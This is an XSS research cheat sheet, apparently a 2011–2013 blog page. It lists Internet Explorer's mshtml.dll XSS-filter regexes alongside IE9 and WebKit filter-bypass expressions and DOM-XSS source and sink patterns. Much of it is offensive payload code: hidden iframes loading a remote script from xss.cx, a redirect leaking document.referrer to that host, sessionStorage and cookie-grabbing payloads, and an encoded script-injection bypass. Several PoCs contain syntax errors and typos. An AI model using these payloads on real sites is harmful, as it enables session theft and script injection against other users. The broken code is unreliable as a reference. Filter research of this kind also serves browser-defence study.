Document Summary: MSHTML.DLL XSS Filter Information on XSS.CX Keyword: XSS, Reflected Cross Site Scripting, DOM-based XSS, CWE-79, CAPEC-86, DORK, GHDB, BHDB, REGEXP, XSSAdmin, XSS Filter, WebKit, Internet Explorer Credits: Kusa55, #thornmaker, DRoss, Colin Jackson, Stefano Di Paola, Mario Heiderich, Gareth Heyes, Sirdarkcat, Kotowicz, RSnake, Giorgio Maone, sqlhacker, Ferruh Mavituna, Mark Flores Martin, others..... Blog Post URL: http://www.cloudscan.me/2011/09/mshtmldll-ie-xss-filter-evasion.html Note: Cumulative URL for IE XSS regex patterns, Sources, Sinks and URL Links ====================================================== Updated: May 21, 2013 - Added IE10 regexp ====================================================== Extract the REGEX from MSHTML.DLL ====================================================== findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{" ====================================================== IE9 Summary - 23 Hardcoded Regex in mshtml.dll ====================================================== Fixed strings (2) javascript:, vbscript: HTML tags (14) object, applet, base, link, meta, import, embed, vmlframe, iframe, script(2), style, isindex, form HTML attributes (3) " datasrc, " style=, " on*= (event handlers) JavaScript strings (4) ";location=, ";a.b=, ");a(, ";a(b) ====================================================== IE XSS REGEX RESULTS (As of 09/2011) for IE9 ====================================================== 
{(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).} {(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).} {.*?((@[i\\])|(([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))))} {[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))} {]} {} {} {[\"\'][ ]*(([^a-z0-9~_:\'\" 
])|(in)).*?(((l|(\\u006C))(o|(\\u006F))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))({m}|(\\u00{6}D))(e|(\\u0065)))).*?=} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=} {[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}} ====================================================== IE XSS REGEX RESULTS (As of 05/2013) for IE10 ====================================================== {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}} {[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\ {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=} {[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}} {]} {.*?((@[i\\])|(([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))))} {[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))} {(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|( 
{(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13) {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006[Cc]))(o|(\\u006[Ff]))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006[Ff]))(n|(\\u006[Ee])))|((n|(\\u006[Ee]))(a|(\\u0061))({m}|(\\u00{6}[Dd]))(e|(\\u0065)))|((o|(\\u006[Ff]))(n|(\\u006[Ee]))({e}|(\\u00{6}5))(r|(\\u0072))(r|(\\u0072))(o|(\\u006[Ff]))(r|(\\u0072)))|((v|(\\u0076))(a|(\\u0061))({l}|(\\u00{6}[Cc]))(u|(\\u0075))(e|(\\u0065) {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=} {} {<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=} {<.*[:]vmlf{r}ame.*?[ /+\t]*?src[ /+\t]*=} {} {]} {} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006[Cc]))(o|(\\u006[Ff]))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006[Ff]))(n|(\\u006[Ee])))|((n|(\\u006[Ee]))(a|(\\u0061))({m}|(\\u00{6}[Dd]))(e|(\\u0065)))|((o|(\\u006[Ff]))(n|(\\u006[Ee]))({e}|(\\u00{6}5))(r|(\\u0072))(r|(\\u0072))(o|(\\u006[Ff]))(r|(\\u0072)))|((v|(\\u0076))(a|(\\u0061))({l}|(\\u00{6}[Cc]))(u|(\\u0075))(e|(\\u0065))(O|(\\u004[Ff]))(f|(\\u0066)))).*?=} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=} {[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}} 
{[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\x53))[^a-z0-9]*(t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*(r|(\\u0072)|(\\162)|(\\x72))[^a-z0-9]*(i|(\\u0069)|(\\151)|(\\x69))[^a-z0-9]*(n|(\\u006E)|(\\156)|(\\x6E))[^a-z0-9]*(g|(\\u0067)|(\\147)|(\\x67)))).*?:} {]} {[ /+\t\"\'`]data{s}rc[ +\t]*?=.} {]} {} {.*?((@[i\\])|(([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&#x?0*((40)|(28)|(92)|(5C));?))))} {[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&#x?0*((40)|(28)|(92)|(5C));?))} ====================================================== Overview - Rules Example ============================================ Craft a URL ============================================ HTTP GET http://victim.fqdn/?xss= ============================================ ============================================ IE9 Filters to Neuter = ============================================ [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))(c|(\\u0063))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))(m|(\\u006D))(e|(\\u0065)))).*?{=} [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(([.].+?)|([\[].*?[\]].*?)){=} ============================================ IE9 Filter Bypass #1 ============================================ Regex = [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(location).*?= Bypass Expression = "+{valueOf:location, toString: [].join,0:'jav\x61script:alert\x280)',length:1}// location("http://xss.cx/"); ============================================ IE9 Filter Bypass #2 ============================================ Regex = {[\\\"\\'][ ]*(([^a-z~_:\\'\\\" 
0-9])|(in)).+?{\\(}.*?{\\)}} Bypass Expression = foo='&js_xss=";alert(0)// Bypass Expression = ",alert(0)// Bypass Expression = foo= ============================================ IE9 Filter Bypass #3 ============================================ Regex = [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(({[.]}.+?)|({[\[]}.*?{[\]]}.*?))= Bypass Expression = ";x:[document.URL='jav\x61script:alert\x280)']// Bypass Expression = ”>link ============================================ WebKit XSSAdmin Filter Bypass #1 ============================================ "> "-prompt(document.location)-" ============================================ XSS Admin, WebKit Filter Bypass #1 ============================================ Referer: http://www.google.com/search?hl=en&q=xss"> User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)xss"> Example PoC Report URL http://xss.cx/2011/06/29/ghdb/dork-xss-reflected-cross-site-scripting-javascript-injection-rest-url-parameter-user-agent-referer-cwe79-capec86-example-poc-report-wwwbankofamericacom.html#1.28 ============================================ DOM-based XSS - Sources and Sinks ============================================ Find Sources: /(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/ ============================================ Find Sinks: /((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/ ============================================ XSS.CX Low Hanging Fruit Examples, PoC, XSS, Expression, DOM-DORK ============================================ Array = (function(orig){ var f = function() { alert('DOH'); return orig.apply(this, arguments); } f.prototype = orig.prototype; return f; })(Array); 
------------------------------------------------ eval(unescape(location.href)) ------------------------------------------------ onreadystatechange=eval(unescape(location.href)) ------------------------------------------------ ?name=xss# ------------------------------------------------ document.write("XSS"); ------------------------------------------------ #%0Afunction%20DOH%28%29{alert%28%27DOH%27%29%3B} DOH(); ============================================ Example FrameBuster JS - From bankofamerica.com ============================================ if (self == top) { var theBody = document.getElementsByTagName('body')[0]; theBody.style.display = "block"; } else { top.location = self.location; } ============================================ XSS Exploit PoC #1 - iFramer ============================================ if (document.getElementsByTagName('body')[0]) { iframer(); } else { document.write(""); } function iframer() { var f = document.createElement('iframe'); f.setAttribute('src', 'http://xss.cx/xss.js'); f.style.visibility = 'hidden'; f.style.position = 'absolute'; f.style.left = '0'; f.style.top = '0'; f.setAttribute('width', '10'); f.setAttribute('height', '10'); document.getElementsByTagName('body')[0].appendChild(f); ============================================ XSS Exploit PoC #2 ============================================ function cx () { try { for (var i = 0; i < navigator.plugins.length; i++) { if {name.indexOf("Media Player") != -1) { var m = document.create.Element("iframe"); m.setAttribute("src", http://xss.cx/xss.js:); m.setAttribute("width", 0); m.setAttribute("height", 0); m.setAttribute("frameborder", 0); document.body.appendChild(m); } } catch (e) { } cx(); ============================================ XSS Exploit PoC #3 ============================================ var url = "htpp://xss.cx/default.aspx?xss="+encodeURIComponent(document.referrer)"; if (window!=top) {top.location.href = url;} else document.location= url; 
============================================ XSS Exploit PoC #4 - Get Local Storage Values ============================================ var ss = ""; for(i = 0; i < window.sessionStorage.length; i++) ss += window.sessionStorage.key(i) + ":" + sessionStorage.getItem(sessionStorage.key(i)) + " "; ============================================ IE9 Q4/2011 Server-encoded PoC XSS Filter Bypass ============================================ %2527%253e%253cScRiPt%253ealert%2528document.location%2529%253c%252fScRiPt%253e ============================================ Some Examples (These are from the URLs listed below) ============================================ http://somesite/test.asp?param=
click to continue
"+eval(name)+" ");eval(name+" ";location=name;// ";a.b=c;// ";a[b]=c;// "+document.cookie+" - Conducting variable assignments to sensitive data, e.g. ";user_input=document.cookie;// or ";user_input=sensitive_app_specific_var;// - Making function assignments, e.g. (Note though that you can't seem to assign to some functions, e.g. alert=eval doesn't seem to work) ";escape=eval;// Examples below are from Michael Coates on using XSS to steal a session ID from local storage. Proof of concept XSS with local storage: Get a Local Storage Value via URL scriptlet: javascript:alert(localStorage.getItem('fooName')); Set a Local Storage Value via URL scriptlet: javascript:localStorage.setItem('fooName','barValue'); Set a Local Storage Value with JSON via URL scriptlet: javascript:localStorage.setItem('fooName', JSON.stringify('data1:a,"data2":b,data3:c')); Get Number of Local Storage Objects via URL scriptlet: javascript:alert(localStorage.length); Clearing all Local Storage associated with site: javascript:localStorage.clear() ============================================ Suggested Reading ============================================ http://blogs.technet.com/b/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx http://p42.us/ie8xss/Abusing_IE8s_XSS_Filters.pdf http://www.collinjackson.com/research/xssauditor.pdf https://www.owasp.org/index.php/DOM_Based_XSS https://code.google.com/p/domxsswiki/wiki/Index http://www.webappsec.org/projects/articles/071105.shtml http://code.google.com/p/urlparsing/ http://kotowicz.net/absolute/ http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html ============================================================ Credits ============================================================ Kusa55, #thornmaker, DRoss, Colin Jackson, Stefano Di Paola, Michael Coates, Mario Heiderich, Gareth Heyes, Sirdarkcat, Kotowicz, RSnake, Giorgio Maone, sqlhacker, Ferruh Mavituna, Mark Flores Martin, many others...
============================================================= Keywords: XSS, Reflected Cross Site Scripting, DOM-based XSS, CWE-79, CAPEC-86, DORK, GHDB, BHDB, REGEXP, XSSAdmin, XSS Filter, WebKit, Internet Explorer ============================================================= ============================================ =========================================== ========================================== XSS.CX Publication Date 9/01/2011